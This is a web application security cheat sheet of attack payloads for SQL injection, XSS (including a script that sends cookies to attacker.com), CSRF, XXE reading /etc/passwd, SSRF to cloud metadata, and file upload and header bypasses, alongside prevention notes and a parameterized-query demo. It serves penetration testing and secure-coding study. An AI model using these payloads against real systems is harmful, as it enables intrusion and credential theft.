
Web Application Security

SQL Injection

Detection

'               -- single quote error
''              -- doubled (escaped) single quote; no error after the single-quote error = likely injectable string context
' OR '1'='1     -- always true
' OR 1=1--      -- comment out rest
" OR "1"="1

UNION-Based

' ORDER BY 3--          -- find number of columns
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--

Blind (Boolean)

' AND 1=1--     -- true
' AND 1=2--     -- false
' AND SUBSTRING(username,1,1)='a'--

Blind (Time-Based)

'; IF (1=1) WAITFOR DELAY '0:0:5'--    -- MSSQL
' AND SLEEP(5)--                        -- MySQL
' || pg_sleep(5)--                      -- PostgreSQL

Common Bypasses

' OR 1=1--
' OR 'x'='x
admin'--
' OR 1=1#
%27 OR %271%27=%271   -- URL encoded
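As an added example (not part of the original cheat sheet), the probes above run against a constructed SQLite table through a string-concatenated lookup and a parameterized one, so the effect of each payload and of the fix can be checked side by side. The table, rows and function names are invented for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not real credentials): three users in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "hunter2"), (2, "bob", "s3cret"), (3, "admin", "pa55w0rd")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """String concatenation: the input becomes part of the SQL text, so a quote
    in the input closes the literal and the remainder is parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """Bound parameter: the driver passes the input as a value, never as SQL,
    so the same payloads are compared literally against the column."""
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def raises_on(payload: str) -> bool:
    """True if the concatenated query fails to parse. The single-quote versus
    doubled-quote probe in the Detection section relies on this difference."""
    try:
        lookup_vulnerable(make_db(), payload)
        return False
    except sqlite3.OperationalError:
        return True


def compare(payload: str) -> tuple:
    """Return (rows from the vulnerable lookup, rows from the safe lookup)."""
    conn = make_db()
    return lookup_vulnerable(conn, payload), lookup_parameterized(conn, payload)


if __name__ == "__main__":
    for p in ["alice", "' OR 1=1--", "admin'--",
              "' UNION SELECT password, username FROM users--"]:
        vuln, safe = compare(p)
        print(f"{p!r:50} vulnerable={len(vuln)} rows  parameterized={len(safe)} rows")
```

The parameterized lookup returns rows only for a literal username match, which is the behaviour to assert on in a regression test.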

Cross-Site Scripting (XSS)

Types

  • Reflected — payload in request, reflected in response
  • Stored — payload saved in DB, shown to all users
  • DOM-based — payload executed via client-side JS

Basic Payloads

<script>alert(1)</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
"><script>alert(1)</script>
';alert(1)//
<script>
  document.location='http://attacker.com/steal?c='+document.cookie
</script>

Filter Bypasses

<ScRiPt>alert(1)</ScRiPt>           -- case variation
<script>\u0061lert(1)</script>      -- unicode escape (JS identifier written as \u0061lert)
<img src=1 onerror=&#97;lert(1)>    -- HTML entities
<scr<script>ipt>alert(1)</script>   -- nested tags

Cross-Site Request Forgery (CSRF)

What It Is

Tricks a logged-in user's browser into sending a state-changing request the user did not intend, with the browser automatically attaching the user's session cookies.

Basic PoC

<form action="https://target.com/change-email" method="POST">
  <input type="hidden" name="email" value="[email protected]">
  <input type="submit" value="Click Me">
</form>
<script>document.forms[0].submit()</script>

GET-based CSRF

<img src="https://target.com/transfer?amount=1000&to=attacker">

Prevention

  • CSRF tokens (synchronizer token pattern)
  • SameSite cookie attribute
  • Custom request headers
  • Double submit cookie

Security Headers

Content-Security-Policy: default-src 'self'
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: geolocation=(), microphone=()

Common Vulnerabilities Quick Reference

IDOR (Insecure Direct Object Reference)

/api/user/123/profile  →  try /api/user/124/profile
/download?file=report_user123.pdf  →  change to another user's file

Open Redirect

https://site.com/redirect?url=https://evil.com

XXE (XML External Entity)

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

SSRF (Server-Side Request Forgery)

https://site.com/fetch?url=http://169.254.169.254/latest/meta-data/
https://site.com/fetch?url=http://localhost:6379/  (Redis)
https://site.com/fetch?url=http://internal-server/admin

File Upload Bypass

shell.php → shell.php.jpg
shell.php → shell.PhP
shell.php → shell.php%00.jpg
Add image magic bytes: FF D8 FF E0 (JPEG)

Useful HTTP Headers to Test

X-Forwarded-For: 127.0.0.1       -- bypass IP restrictions
X-Real-IP: 127.0.0.1
X-Original-URL: /admin           -- path override
X-Custom-IP-Authorization: 127.0.0.1
Referer: https://trusted.com